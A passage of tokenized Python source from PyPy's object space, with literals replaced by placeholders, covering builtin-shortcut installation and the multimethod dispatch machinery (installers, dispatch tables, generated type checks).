KNOWN_MISSING = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:float>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> for _name , _ , _ , _specialmethods in ObjSpace . MethodTable : <EOL> if _specialmethods : <EOL> assert _name in METHODS_WITH_SHORTCUT or _name in KNOWN_MISSING , ( <EOL> "<STR_LIT>" <EOL> % ( _name , ) ) <EOL> def filter_out_conversions ( typeorder ) : <EOL> res = { } <EOL> for cls , order in typeorder . 
iteritems ( ) : <EOL> res [ cls ] = [ ( target_type , converter ) for ( target_type , converter ) in <EOL> order if converter is None ] <EOL> return res <EOL> def install ( space , mm , fallback_mm = None ) : <EOL> """<STR_LIT>""" <EOL> name = mm . name <EOL> if name not in METHODS_WITH_SHORTCUT : <EOL> return None <EOL> if name in space . __dict__ : <EOL> mm1 , shortcut_method = space . __dict__ [ name ] . builtinshortcut <EOL> assert mm1 is mm <EOL> return shortcut_method <EOL> assert hasattr ( DescrOperation , name ) <EOL> base_method = getattr ( space . __class__ , name ) <EOL> expanded_order = space . model . get_typeorder_with_empty_usersubcls ( ) <EOL> if fallback_mm : <EOL> mm = mm . merge_with ( fallback_mm ) <EOL> shortcut_method = mm . install_not_sliced ( filter_out_conversions ( expanded_order ) ) <EOL> def operate ( * args_w ) : <EOL> try : <EOL> return shortcut_method ( space , * args_w ) <EOL> except FailedToImplement : <EOL> pass <EOL> return base_method ( space , * args_w ) <EOL> operate = func_with_new_name ( operate , name ) <EOL> operate . builtinshortcut = ( mm , shortcut_method ) <EOL> setattr ( space , name , operate ) <EOL> return shortcut_method <EOL> def install_is_true ( space , mm_nonzero , mm_len ) : <EOL> shortcut = install ( space , mm_nonzero , fallback_mm = mm_len ) <EOL> assert '<STR_LIT>' not in space . __dict__ <EOL> def is_true ( w_obj ) : <EOL> try : <EOL> w_res = shortcut ( space , w_obj ) <EOL> except FailedToImplement : <EOL> pass <EOL> else : <EOL> if isinstance ( w_res , W_BoolObject ) : <EOL> return w_res . boolval <EOL> try : <EOL> return space . int_w ( w_res ) != <NUM_LIT:0> <EOL> except OperationError : <EOL> w_obj = w_res <EOL> return DescrOperation . is_true ( space , w_obj ) <EOL> space . is_true = is_true </s>
<s> from pypy . tool . sourcetools import compile2 <EOL> class FailedToImplement ( Exception ) : <EOL> def __init__ ( self , w_type = None , w_value = None ) : <EOL> self . w_type = w_type <EOL> self . w_value = w_value <EOL> def raiseFailedToImplement ( ) : <EOL> raise FailedToImplement <EOL> class MultiMethodTable : <EOL> def __init__ ( self , arity , root_class , argnames_before = [ ] , argnames_after = [ ] ) : <EOL> """<STR_LIT>""" <EOL> if arity < <NUM_LIT:1> : <EOL> raise ValueError , "<STR_LIT>" <EOL> self . arity = arity <EOL> self . root_class = root_class <EOL> self . dispatch_tree = { } <EOL> self . argnames_before = list ( argnames_before ) <EOL> self . argnames_after = list ( argnames_after ) <EOL> def register ( self , function , * types , ** kwds ) : <EOL> assert len ( types ) == self . arity <EOL> assert kwds . keys ( ) == [ ] or kwds . keys ( ) == [ '<STR_LIT>' ] <EOL> order = kwds . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> node = self . dispatch_tree <EOL> for type in types [ : - <NUM_LIT:1> ] : <EOL> node = node . setdefault ( type , { } ) <EOL> lst = node . setdefault ( types [ - <NUM_LIT:1> ] , [ ] ) <EOL> if order >= len ( lst ) : <EOL> lst += [ None ] * ( order + <NUM_LIT:1> - len ( lst ) ) <EOL> assert lst [ order ] is None , "<STR_LIT>" % ( <EOL> types , order ) <EOL> lst [ order ] = function <EOL> def install ( self , prefix , list_of_typeorders , baked_perform_call = True , <EOL> base_typeorder = None , installercls = None ) : <EOL> "<STR_LIT>" <EOL> assert len ( list_of_typeorders ) == self . arity <EOL> installercls = installercls or Installer <EOL> installer = installercls ( self , prefix , list_of_typeorders , <EOL> baked_perform_call = baked_perform_call , <EOL> base_typeorder = base_typeorder ) <EOL> return installer . install ( ) <EOL> def install_if_not_empty ( self , prefix , list_of_typeorders , <EOL> base_typeorder = None , installercls = None ) : <EOL> "<STR_LIT>" <EOL> assert len ( list_of_typeorders ) == self . 
arity <EOL> installercls = installercls or Installer <EOL> installer = installercls ( self , prefix , list_of_typeorders , <EOL> base_typeorder = base_typeorder ) <EOL> if installer . is_empty ( ) : <EOL> return None <EOL> else : <EOL> return installer . install ( ) <EOL> def getfunctions ( self , types ) : <EOL> assert len ( types ) == self . arity <EOL> node = self . dispatch_tree <EOL> for type in types : <EOL> node = node [ type ] <EOL> return [ fn for fn in node if fn is not None ] <EOL> def has_signature ( self , types ) : <EOL> try : <EOL> self . getfunctions ( types ) <EOL> except KeyError : <EOL> return False <EOL> else : <EOL> return True <EOL> def signatures ( self ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> def enum_keys ( types_so_far , node ) : <EOL> for type , subnode in node . items ( ) : <EOL> next_types = types_so_far + ( type , ) <EOL> if isinstance ( subnode , dict ) : <EOL> enum_keys ( next_types , subnode ) <EOL> else : <EOL> assert len ( next_types ) == self . arity <EOL> result . append ( next_types ) <EOL> enum_keys ( ( ) , self . dispatch_tree ) <EOL> return result <EOL> class InstallerVersion1 : <EOL> """<STR_LIT>""" <EOL> instance_counter = <NUM_LIT:0> <EOL> mmfunccache = { } <EOL> prefix_memo = { } <EOL> def __init__ ( self , multimethod , prefix , list_of_typeorders , <EOL> baked_perform_call = True , base_typeorder = None ) : <EOL> self . __class__ . instance_counter += <NUM_LIT:1> <EOL> self . multimethod = multimethod <EOL> base_prefix = prefix <EOL> n = <NUM_LIT:1> <EOL> while prefix in self . prefix_memo : <EOL> n += <NUM_LIT:1> <EOL> prefix = "<STR_LIT>" % ( base_prefix , n ) <EOL> self . prefix = prefix <EOL> self . prefix_memo [ prefix ] = <NUM_LIT:1> <EOL> self . list_of_typeorders = list_of_typeorders <EOL> self . check_typeorders ( ) <EOL> self . subtree_cache = { } <EOL> self . to_install = [ ] <EOL> self . non_empty = self . build_tree ( [ ] , multimethod . dispatch_tree ) <EOL> self . 
baked_perform_call = baked_perform_call <EOL> if self . non_empty : <EOL> perform = [ ( None , prefix , <NUM_LIT:0> ) ] <EOL> else : <EOL> perform = [ ] <EOL> self . perform_call = self . build_function ( None , prefix + '<STR_LIT>' , <EOL> None , perform ) <EOL> def check_typeorders ( self ) : <EOL> for typeorder in self . list_of_typeorders : <EOL> for type in typeorder : <EOL> assert '<STR_LIT>' not in type . __name__ , ( <EOL> "<STR_LIT>" % ( type , ) ) <EOL> names = dict . fromkeys ( [ type . __name__ for type in typeorder ] ) <EOL> assert len ( names ) == len ( typeorder ) , ( <EOL> "<STR_LIT>" % ( typeorder , ) ) <EOL> def is_empty ( self ) : <EOL> return not self . non_empty <EOL> def install ( self ) : <EOL> def class_key ( cls ) : <EOL> "<STR_LIT>" <EOL> return len ( cls . __mro__ ) <EOL> def key ( target , funcname , func , source , fallback ) : <EOL> if target is None : <EOL> return ( ) <EOL> return ( class_key ( target ) , not fallback ) <EOL> self . to_install . sort ( lambda a , b : cmp ( key ( * a ) , key ( * b ) ) ) <EOL> for target , funcname , func , source , fallback in self . to_install : <EOL> if target is not None : <EOL> parentfunc = getattr ( target , funcname , None ) <EOL> parentfunc = getattr ( parentfunc , '<STR_LIT>' , None ) <EOL> if parentfunc is func : <EOL> continue <EOL> setattr ( target , funcname , func ) <EOL> return self . perform_call <EOL> def build_tree ( self , types_so_far , dispatch_node ) : <EOL> key = tuple ( types_so_far ) <EOL> if key in self . subtree_cache : <EOL> return self . subtree_cache [ key ] <EOL> non_empty = False <EOL> typeorder = self . list_of_typeorders [ len ( types_so_far ) ] <EOL> for next_type in typeorder : <EOL> if self . build_single_method ( typeorder , types_so_far , next_type , <EOL> dispatch_node ) : <EOL> non_empty = True <EOL> self . 
subtree_cache [ key ] = non_empty <EOL> return non_empty <EOL> def build_single_method ( self , typeorder , types_so_far , next_type , <EOL> dispatch_node ) : <EOL> funcname = '<STR_LIT>' . join ( [ self . prefix ] + [ t . __name__ for t in types_so_far ] ) <EOL> order = typeorder [ next_type ] <EOL> things_to_call = [ ] <EOL> for type , conversion in order : <EOL> if type not in dispatch_node : <EOL> continue <EOL> match = dispatch_node [ type ] <EOL> if isinstance ( match , dict ) : <EOL> if self . build_tree ( types_so_far + [ type ] , match ) : <EOL> call = funcname + '<STR_LIT>' + type . __name__ <EOL> call_selfarg_index = len ( types_so_far ) + <NUM_LIT:1> <EOL> things_to_call . append ( ( conversion , call , <EOL> call_selfarg_index ) ) <EOL> else : <EOL> for func in match : <EOL> if func is not None : <EOL> things_to_call . append ( ( conversion , func , None ) ) <EOL> funcname = intern ( funcname ) <EOL> self . build_function ( next_type , funcname , len ( types_so_far ) , <EOL> things_to_call ) <EOL> return bool ( things_to_call ) <EOL> def build_function ( self , target , funcname , func_selfarg_index , <EOL> things_to_call ) : <EOL> miniglobals = { '<STR_LIT>' : FailedToImplement , '<STR_LIT>' : __name__ } <EOL> def invent_name ( obj ) : <EOL> if isinstance ( obj , str ) : <EOL> return obj <EOL> name = obj . __name__ <EOL> n = <NUM_LIT:1> <EOL> while name in miniglobals : <EOL> n += <NUM_LIT:1> <EOL> name = '<STR_LIT>' % ( obj . __name__ , n ) <EOL> miniglobals [ name ] = obj <EOL> return name <EOL> funcargs = [ '<STR_LIT>' % i for i in range ( self . multimethod . arity ) ] <EOL> bodylines = [ ] <EOL> for conversion , call , call_selfarg_index in things_to_call : <EOL> callargs = funcargs [ : ] <EOL> if conversion is not None : <EOL> to_convert = func_selfarg_index <EOL> convert_callargs = ( self . multimethod . 
argnames_before + <EOL> [ callargs [ to_convert ] ] ) <EOL> callargs [ to_convert ] = '<STR_LIT>' % ( <EOL> invent_name ( conversion ) , '<STR_LIT:U+002CU+0020>' . join ( convert_callargs ) ) <EOL> callname = invent_name ( call ) <EOL> if call_selfarg_index is not None : <EOL> self . build_function ( self . multimethod . root_class , <EOL> callname , call_selfarg_index , [ ] ) <EOL> callname = '<STR_LIT>' % ( callargs . pop ( call_selfarg_index ) , callname ) <EOL> callargs = ( self . multimethod . argnames_before + <EOL> callargs + self . multimethod . argnames_after ) <EOL> bodylines . append ( '<STR_LIT>' % ( callname , '<STR_LIT:U+002CU+0020>' . join ( callargs ) ) ) <EOL> fallback = False <EOL> if not bodylines : <EOL> miniglobals [ '<STR_LIT>' ] = raiseFailedToImplement <EOL> bodylines = [ '<STR_LIT>' ] <EOL> fallback = True <EOL> for i in range ( len ( bodylines ) - <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> bodylines [ i : i + <NUM_LIT:1> ] = [ '<STR_LIT>' , <EOL> '<STR_LIT:U+0020>' + bodylines [ i ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> if func_selfarg_index is not None : <EOL> selfargs = [ funcargs . pop ( func_selfarg_index ) ] <EOL> else : <EOL> selfargs = [ ] <EOL> funcargs = ( selfargs + self . multimethod . argnames_before + <EOL> funcargs + self . multimethod . argnames_after ) <EOL> if target is None and not self . baked_perform_call : <EOL> return funcargs , bodylines [ <NUM_LIT:0> ] [ len ( '<STR_LIT>' ) : ] , miniglobals , fallback <EOL> bodylines = [ '<STR_LIT:U+0020>' + line for line in bodylines ] <EOL> bodylines . insert ( <NUM_LIT:0> , '<STR_LIT>' % ( funcname , '<STR_LIT:U+002CU+0020>' . join ( funcargs ) ) ) <EOL> bodylines . append ( '<STR_LIT>' ) <EOL> source = '<STR_LIT:\n>' . join ( bodylines ) <EOL> l = miniglobals . items ( ) <EOL> l . sort ( ) <EOL> l = tuple ( l ) <EOL> key = ( source , l ) <EOL> try : <EOL> func = self . 
mmfunccache [ key ] <EOL> except KeyError : <EOL> exec compile2 ( source ) in miniglobals <EOL> func = miniglobals [ funcname ] <EOL> self . mmfunccache [ key ] = func <EOL> self . to_install . append ( ( target , funcname , func , source , fallback ) ) <EOL> return func <EOL> class MMDispatcher ( object ) : <EOL> """<STR_LIT>""" <EOL> _revcache = None <EOL> def __init__ ( self , multimethod , list_of_typeorders ) : <EOL> self . multimethod = multimethod <EOL> self . list_of_typeorders = list_of_typeorders <EOL> def __call__ ( self , * args ) : <EOL> i = len ( self . multimethod . argnames_before ) <EOL> j = i + self . multimethod . arity <EOL> k = j + len ( self . multimethod . argnames_after ) <EOL> assert len ( args ) == k <EOL> prefixargs = args [ : i ] <EOL> dispatchargs = args [ i : j ] <EOL> suffixargs = args [ j : ] <EOL> return self . dispatch ( [ x . __class__ for x in dispatchargs ] , <EOL> prefixargs , <EOL> dispatchargs , <EOL> suffixargs ) <EOL> def dispatch ( self , argtypes , prefixargs , args , suffixargs ) : <EOL> def expr ( v ) : <EOL> if isinstance ( v , Call ) : <EOL> return v . function ( * [ expr ( w ) for w in v . arguments ] ) <EOL> else : <EOL> return v <EOL> e = None <EOL> for v in self . expressions ( argtypes , prefixargs , args , suffixargs ) : <EOL> try : <EOL> return expr ( v ) <EOL> except FailedToImplement , e : <EOL> pass <EOL> else : <EOL> raise e or FailedToImplement ( ) <EOL> def expressions ( self , argtypes , prefixargs , args , suffixargs ) : <EOL> """<STR_LIT>""" <EOL> prefixargs = tuple ( prefixargs ) <EOL> suffixargs = tuple ( suffixargs ) <EOL> def walktree ( node , args_so_far ) : <EOL> if isinstance ( node , list ) : <EOL> for func in node : <EOL> if func is not None : <EOL> result . append ( Call ( func , prefixargs + <EOL> args_so_far + <EOL> suffixargs ) ) <EOL> else : <EOL> index = len ( args_so_far ) <EOL> typeorder = self . 
list_of_typeorders [ index ] <EOL> next_type = argtypes [ index ] <EOL> for target_type , converter in typeorder [ next_type ] : <EOL> if target_type not in node : <EOL> continue <EOL> next_arg = args [ index ] <EOL> if converter : <EOL> next_arg = Call ( converter , prefixargs + ( next_arg , ) ) <EOL> walktree ( node [ target_type ] , args_so_far + ( next_arg , ) ) <EOL> result = [ ] <EOL> walktree ( self . multimethod . dispatch_tree , ( ) ) <EOL> return result <EOL> def anychance ( self , typesprefix ) : <EOL> if self . _revcache is None : <EOL> def build_tree ( types_so_far , dispatch_node ) : <EOL> non_empty = False <EOL> typeorder = self . list_of_typeorders [ len ( types_so_far ) ] <EOL> for next_type in typeorder : <EOL> if build_single_method ( typeorder , types_so_far , next_type , <EOL> dispatch_node ) : <EOL> non_empty = True <EOL> if non_empty : <EOL> self . _revcache [ types_so_far ] = True <EOL> return non_empty <EOL> def build_single_method ( typeorder , types_so_far , next_type , <EOL> dispatch_node ) : <EOL> order = typeorder [ next_type ] <EOL> things_to_call = False <EOL> for type , conversion in order : <EOL> if type not in dispatch_node : <EOL> continue <EOL> match = dispatch_node [ type ] <EOL> if isinstance ( match , dict ) : <EOL> if build_tree ( types_so_far + ( next_type , ) , match ) : <EOL> things_to_call = True <EOL> elif match : <EOL> things_to_call = True <EOL> return things_to_call <EOL> self . _revcache = { } <EOL> build_tree ( ( ) , self . multimethod . dispatch_tree ) <EOL> return tuple ( typesprefix ) in self . _revcache <EOL> class Call ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , function , arguments ) : <EOL> self . function = function <EOL> self . arguments = arguments <EOL> class CompressedArray ( object ) : <EOL> def __init__ ( self , null_value ) : <EOL> self . null_value = null_value <EOL> self . items = [ null_value ] <EOL> def ensure_length ( self , newlen ) : <EOL> if newlen > len ( self . 
items ) : <EOL> self . items . extend ( [ self . null_value ] * ( newlen - len ( self . items ) ) ) <EOL> def insert_subarray ( self , array ) : <EOL> if array . count ( self . null_value ) == len ( array ) : <EOL> return <NUM_LIT:0> <EOL> test = <NUM_LIT:1> <EOL> while True : <EOL> self . ensure_length ( test + len ( array ) ) <EOL> for i in range ( len ( array ) ) : <EOL> if not ( array [ i ] == self . items [ test + i ] or <EOL> array [ i ] == self . null_value or <EOL> self . items [ test + i ] == self . null_value ) : <EOL> break <EOL> else : <EOL> for i in range ( len ( array ) ) : <EOL> if array [ i ] != self . null_value : <EOL> self . items [ test + i ] = array [ i ] <EOL> return test <EOL> test += <NUM_LIT:1> <EOL> def _freeze_ ( self ) : <EOL> return True <EOL> class MRDTable ( object ) : <EOL> Counter = <NUM_LIT:0> <EOL> def __init__ ( self , list_of_types ) : <EOL> self . id = MRDTable . Counter <EOL> MRDTable . Counter += <NUM_LIT:1> <EOL> self . list_of_types = list_of_types <EOL> self . typenum = dict ( zip ( list_of_types , range ( len ( list_of_types ) ) ) ) <EOL> self . attrname = '<STR_LIT>' % self . id <EOL> for t1 , num in self . typenum . items ( ) : <EOL> setattr ( t1 , self . attrname , num ) <EOL> self . indexarray = CompressedArray ( <NUM_LIT:0> ) <EOL> def get_typenum ( self , cls ) : <EOL> return self . typenum [ cls ] <EOL> def is_anti_range ( self , typenums ) : <EOL> n = len ( self . list_of_types ) <EOL> if len ( typenums ) <= n // <NUM_LIT:2> : <EOL> return ( None , None ) <EOL> typenums = dict . fromkeys ( typenums ) <EOL> complement = [ typenum for typenum in range ( n ) <EOL> if typenum not in typenums ] <EOL> if not complement : <EOL> return ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> a = min ( complement ) <EOL> b = max ( complement ) + <NUM_LIT:1> <EOL> if complement == range ( a , b ) : <EOL> return ( a , b ) <EOL> else : <EOL> return ( None , None ) <EOL> def normalize_length ( self , next_array ) : <EOL> self . indexarray . 
ensure_length ( len ( next_array . items ) ) <EOL> def invent_name ( miniglobals , obj ) : <EOL> if isinstance ( obj , str ) : <EOL> return obj <EOL> name = obj . __name__ <EOL> n = <NUM_LIT:1> <EOL> while name in miniglobals : <EOL> n += <NUM_LIT:1> <EOL> name = '<STR_LIT>' % ( obj . __name__ , n ) <EOL> miniglobals [ name ] = obj <EOL> return name <EOL> class FuncEntry ( object ) : <EOL> def __init__ ( self , bodylines , miniglobals , fallback ) : <EOL> self . body = '<STR_LIT>' . join ( bodylines ) <EOL> self . miniglobals = miniglobals <EOL> self . fallback = fallback <EOL> self . possiblenames = [ ] <EOL> self . typetree = { } <EOL> self . _function = None <EOL> def key ( self ) : <EOL> lst = self . miniglobals . items ( ) <EOL> lst . sort ( ) <EOL> return self . body , tuple ( lst ) <EOL> def get_function_name ( self ) : <EOL> length = min ( [ len ( parts ) for parts in self . possiblenames ] ) <EOL> result = [ ] <EOL> for i in range ( length ) : <EOL> choices = { } <EOL> for parts in self . possiblenames : <EOL> choices [ parts [ i ] ] = True <EOL> parts = choices . keys ( ) <EOL> res = str ( len ( parts ) ) <EOL> for part in parts : <EOL> if type ( part ) is str : <EOL> if '<STR_LIT>' in choices : <EOL> res = '<STR_LIT>' <EOL> elif len ( parts ) == <NUM_LIT:1> : <EOL> res = part <EOL> break <EOL> else : <EOL> basecls = parts [ <NUM_LIT:0> ] <EOL> for cls in parts [ <NUM_LIT:1> : ] : <EOL> if issubclass ( basecls , cls ) : <EOL> basecls = cls <EOL> for cls in parts [ <NUM_LIT:1> : ] : <EOL> if not issubclass ( cls , basecls ) : <EOL> break <EOL> else : <EOL> res = basecls . __name__ <EOL> result . append ( res ) <EOL> return '<STR_LIT:_>' . join ( result ) <EOL> def make_function ( self , fnargs , nbargs_before , mrdtable ) : <EOL> if self . _function is not None : <EOL> return self . _function <EOL> name = self . get_function_name ( ) <EOL> self . compress_typechecks ( mrdtable ) <EOL> checklines = self . 
generate_typechecks ( mrdtable , fnargs [ nbargs_before : ] ) <EOL> if not checklines : <EOL> body = self . body <EOL> else : <EOL> checklines . append ( self . body ) <EOL> body = '<STR_LIT>' . join ( checklines ) <EOL> source = '<STR_LIT>' % ( name , '<STR_LIT:U+002CU+0020>' . join ( fnargs ) , body ) <EOL> self . debug_dump ( source ) <EOL> exec compile2 ( source ) in self . miniglobals <EOL> self . _function = self . miniglobals [ name ] <EOL> return self . _function <EOL> def debug_dump ( self , source ) : <EOL> if <NUM_LIT:0> : <EOL> name = self . get_function_name ( ) <EOL> f = open ( '<STR_LIT>' % name , '<STR_LIT:a>' ) <EOL> for possiblename in self . possiblenames : <EOL> print >> f , '<STR_LIT:#>' , <EOL> for part in possiblename : <EOL> print >> f , getattr ( part , '<STR_LIT>' , part ) , <EOL> print >> f <EOL> print >> f <EOL> print >> f , source <EOL> f . close ( ) <EOL> def register_valid_types ( self , types ) : <EOL> node = self . typetree <EOL> for t1 in types [ : - <NUM_LIT:1> ] : <EOL> if node is True : <EOL> return <EOL> node = node . setdefault ( t1 , { } ) <EOL> if node is True : <EOL> return <EOL> node [ types [ - <NUM_LIT:1> ] ] = True <EOL> def no_typecheck ( self ) : <EOL> self . typetree = True <EOL> def compress_typechecks ( self , mrdtable ) : <EOL> def full ( node ) : <EOL> if node is True : <EOL> return <NUM_LIT:1> <EOL> fulls = <NUM_LIT:0> <EOL> for key , subnode in node . items ( ) : <EOL> if full ( subnode ) : <EOL> node [ key ] = True <EOL> fulls += <NUM_LIT:1> <EOL> if fulls == types_total : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> types_total = len ( mrdtable . list_of_types ) <EOL> if full ( self . typetree ) : <EOL> self . typetree = True <EOL> def generate_typechecks ( self , mrdtable , args ) : <EOL> attrname = mrdtable . 
attrname <EOL> possibletypes = [ { } for _ in args ] <EOL> any_type_is_ok = [ False for _ in args ] <EOL> def generate ( node , level = <NUM_LIT:0> ) : <EOL> result = [ ] <EOL> indent = '<STR_LIT:U+0020>' * level <EOL> if node is True : <EOL> for i in range ( level , len ( args ) ) : <EOL> any_type_is_ok [ i ] = True <EOL> result . append ( '<STR_LIT>' % ( indent , ) ) <EOL> return result <EOL> if not node : <EOL> result . append ( '<STR_LIT>' % ( indent , ) ) <EOL> return result <EOL> result . append ( '<STR_LIT>' % ( indent , args [ level ] , <EOL> attrname ) ) <EOL> cases = { } <EOL> for key , subnode in node . items ( ) : <EOL> possibletypes [ level ] [ key ] = True <EOL> casebody = tuple ( generate ( subnode , level + <NUM_LIT:1> ) ) <EOL> typenum = mrdtable . get_typenum ( key ) <EOL> cases . setdefault ( casebody , [ ] ) . append ( typenum ) <EOL> for casebody , typenums in cases . items ( ) : <EOL> typenums . sort ( ) <EOL> cases = [ ( typenums , casebody ) <EOL> for ( casebody , typenums ) in cases . items ( ) ] <EOL> cases . sort ( ) <EOL> if len ( cases ) == <NUM_LIT:1> : <EOL> typenums , casebody = cases [ <NUM_LIT:0> ] <EOL> a , b = mrdtable . is_anti_range ( typenums ) <EOL> else : <EOL> a , b = None , None <EOL> keyword = '<STR_LIT>' <EOL> for typenums , casebody in cases : <EOL> if a is not None : <EOL> if b - a == <NUM_LIT:1> : <EOL> condition = '<STR_LIT>' % a <EOL> elif b == a : <EOL> condition = '<STR_LIT:True>' <EOL> else : <EOL> condition = '<STR_LIT>' % ( <EOL> a , b ) <EOL> else : <EOL> conditions = [ '<STR_LIT>' % typenum <EOL> for typenum in typenums ] <EOL> condition = '<STR_LIT>' . join ( conditions ) <EOL> result . append ( '<STR_LIT>' % ( indent , keyword , condition ) ) <EOL> result . extend ( casebody ) <EOL> keyword = '<STR_LIT>' <EOL> result . append ( '<STR_LIT>' % ( indent , ) ) <EOL> result . append ( '<STR_LIT>' % ( indent , ) ) <EOL> return result <EOL> result = [ ] <EOL> if self . typetree is not True : <EOL> result . 
extend ( generate ( self . typetree ) ) <EOL> result . append ( '<STR_LIT>' ) <EOL> result . append ( '<STR_LIT>' ) <EOL> for level in range ( len ( args ) ) : <EOL> if not any_type_is_ok [ level ] : <EOL> cls = commonbase ( possibletypes [ level ] . keys ( ) ) <EOL> clsname = invent_name ( self . miniglobals , cls ) <EOL> result . append ( '<STR_LIT>' % ( args [ level ] , <EOL> clsname ) ) <EOL> return result <EOL> def commonbase ( classlist ) : <EOL> def baseclasses ( cls ) : <EOL> result = set ( [ cls ] ) <EOL> for base in cls . __bases__ : <EOL> if '<STR_LIT>' not in base . __dict__ : <EOL> result |= baseclasses ( base ) <EOL> return result <EOL> bag = baseclasses ( classlist [ <NUM_LIT:0> ] ) <EOL> for cls in classlist [ <NUM_LIT:1> : ] : <EOL> bag &= baseclasses ( cls ) <EOL> _ , candidate = max ( [ ( len ( cls . __mro__ ) , cls ) for cls in bag ] ) <EOL> for cls in bag : <EOL> assert issubclass ( candidate , cls ) <EOL> return candidate <EOL> class InstallerVersion2 ( object ) : <EOL> """<STR_LIT>""" <EOL> instance_counter = <NUM_LIT:0> <EOL> mrdtables = { } <EOL> def __init__ ( self , multimethod , prefix , list_of_typeorders , <EOL> baked_perform_call = True , base_typeorder = None ) : <EOL> self . __class__ . instance_counter += <NUM_LIT:1> <EOL> self . multimethod = multimethod <EOL> self . prefix = prefix <EOL> self . list_of_typeorders = list_of_typeorders <EOL> self . baked_perform_call = baked_perform_call <EOL> self . mmfunccache = { } <EOL> args = [ '<STR_LIT>' % i for i in range ( multimethod . arity ) ] <EOL> self . fnargs = ( multimethod . argnames_before + args + <EOL> multimethod . argnames_after ) <EOL> base_typeorder = base_typeorder or list_of_typeorders [ <NUM_LIT:0> ] <EOL> for typeorder in list_of_typeorders : <EOL> for t1 in typeorder : <EOL> assert t1 in base_typeorder <EOL> lst = list ( base_typeorder ) <EOL> def clskey ( cls ) : <EOL> return cls . __mro__ [ : : - <NUM_LIT:1> ] <EOL> lst . 
sort ( lambda cls1 , cls2 : cmp ( clskey ( cls1 ) , clskey ( cls2 ) ) ) <EOL> key = tuple ( lst ) <EOL> try : <EOL> self . mrdtable = self . mrdtables [ key ] <EOL> except KeyError : <EOL> self . mrdtable = self . mrdtables [ key ] = MRDTable ( key ) <EOL> dispatcher = MMDispatcher ( multimethod , list_of_typeorders ) <EOL> self . table = { } <EOL> def buildtable ( prefixtypes ) : <EOL> if len ( prefixtypes ) == multimethod . arity : <EOL> calllist = dispatcher . expressions ( prefixtypes , <EOL> multimethod . argnames_before , <EOL> args , <EOL> multimethod . argnames_after ) <EOL> if calllist : <EOL> self . table [ prefixtypes ] = calllist <EOL> elif dispatcher . anychance ( prefixtypes ) : <EOL> typeorder = list_of_typeorders [ len ( prefixtypes ) ] <EOL> for t1 in typeorder : <EOL> buildtable ( prefixtypes + ( t1 , ) ) <EOL> buildtable ( ( ) ) <EOL> self . dispatcher = dispatcher <EOL> def is_empty ( self ) : <EOL> return len ( self . table ) == <NUM_LIT:0> <EOL> def install ( self ) : <EOL> nskip = len ( self . multimethod . argnames_before ) <EOL> null_entry = self . build_funcentry ( [ self . prefix , '<STR_LIT>' ] , [ ] ) <EOL> null_entry . no_typecheck ( ) <EOL> if self . is_empty ( ) : <EOL> return self . answer ( null_entry ) <EOL> entryarray = CompressedArray ( null_entry ) <EOL> indexarray = self . mrdtable . indexarray <EOL> lst = self . mrdtable . list_of_types <EOL> indexline = [ ] <EOL> def compress ( typesprefix , typesnum ) : <EOL> if len ( typesprefix ) == self . multimethod . arity : <EOL> calllist = self . table . get ( typesprefix , [ ] ) <EOL> funcname = [ self . prefix ] <EOL> funcname . extend ( typesprefix ) <EOL> entry = self . build_funcentry ( funcname , calllist ) <EOL> entry . register_valid_types ( typesprefix ) <EOL> return entry <EOL> elif self . dispatcher . 
anychance ( typesprefix ) : <EOL> flatline = [ ] <EOL> for num1 , t1 in enumerate ( lst ) : <EOL> item = compress ( typesprefix + ( t1 , ) , typesnum + ( num1 , ) ) <EOL> flatline . append ( item ) <EOL> if len ( typesprefix ) == self . multimethod . arity - <NUM_LIT:1> : <EOL> array = entryarray <EOL> else : <EOL> array = indexarray <EOL> return array . insert_subarray ( flatline ) <EOL> else : <EOL> return <NUM_LIT:0> <EOL> master_index = compress ( ( ) , ( ) ) <EOL> null_func = null_entry . make_function ( self . fnargs , nskip , self . mrdtable ) <EOL> funcarray = CompressedArray ( null_func ) <EOL> N = <NUM_LIT:1> <EOL> while N < len ( entryarray . items ) : <EOL> N *= <NUM_LIT:2> <EOL> funcarray . ensure_length ( N ) <EOL> for i , entry in enumerate ( entryarray . items ) : <EOL> func = entry . make_function ( self . fnargs , nskip , self . mrdtable ) <EOL> funcarray . items [ i ] = func <EOL> self . mrdtable . normalize_length ( funcarray ) <EOL> attrname = self . mrdtable . attrname <EOL> exprfn = "<STR_LIT>" % master_index <EOL> for n in range ( self . multimethod . arity - <NUM_LIT:1> ) : <EOL> exprfn = "<STR_LIT>" % ( exprfn , n , attrname ) <EOL> n = self . multimethod . arity - <NUM_LIT:1> <EOL> exprfn = "<STR_LIT>" % ( exprfn , n , <EOL> attrname ) <EOL> expr = Call ( exprfn , self . fnargs ) <EOL> entry = self . build_funcentry ( [ self . prefix , '<STR_LIT>' ] , <EOL> [ expr ] , <EOL> indexarray = indexarray , <EOL> funcarray = funcarray , <EOL> mmmask = N - <NUM_LIT:1> ) <EOL> entry . no_typecheck ( ) <EOL> return self . answer ( entry ) <EOL> def answer ( self , entry ) : <EOL> if self . baked_perform_call : <EOL> nskip = len ( self . multimethod . argnames_before ) <EOL> return entry . make_function ( self . fnargs , nskip , self . mrdtable ) <EOL> else : <EOL> assert entry . body . startswith ( '<STR_LIT>' ) <EOL> expr = entry . body [ len ( '<STR_LIT>' ) : ] <EOL> entry . debug_dump ( entry . body ) <EOL> return self . fnargs , expr , entry . 
